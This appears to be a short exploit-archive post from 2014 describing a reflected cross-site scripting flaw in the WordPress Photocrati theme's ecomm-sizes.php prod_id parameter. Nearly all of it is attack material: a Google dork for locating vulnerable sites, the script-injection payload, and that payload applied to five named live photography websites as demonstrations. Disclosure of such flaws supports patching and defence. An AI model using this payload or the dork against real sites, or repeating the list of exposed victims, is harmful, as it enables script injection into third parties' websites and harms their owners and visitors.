WordPress Photocrati Theme suffers from a cross site scripting vulnerability.
2c0a0d09eabe3d8c389700133ca742ee4514f4b658e287ca801e58421be8784e
######################
# Exploit Title : Wordpress Photocrati-theme Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://www.photocrati.com
# Google Dork : inurl :
inurl:wp-content/themes/photocrati-theme/photocrati-gallery
# Date : 2014-01-29
# Tested on : Windows 7
######################
# Location :
localhost/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=[Xss]
######################
# Demo :
#
http://abandonphotography.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://remingtonphotographyohio.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://stephimals.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://justinsweet.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://riseupgallery.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
######################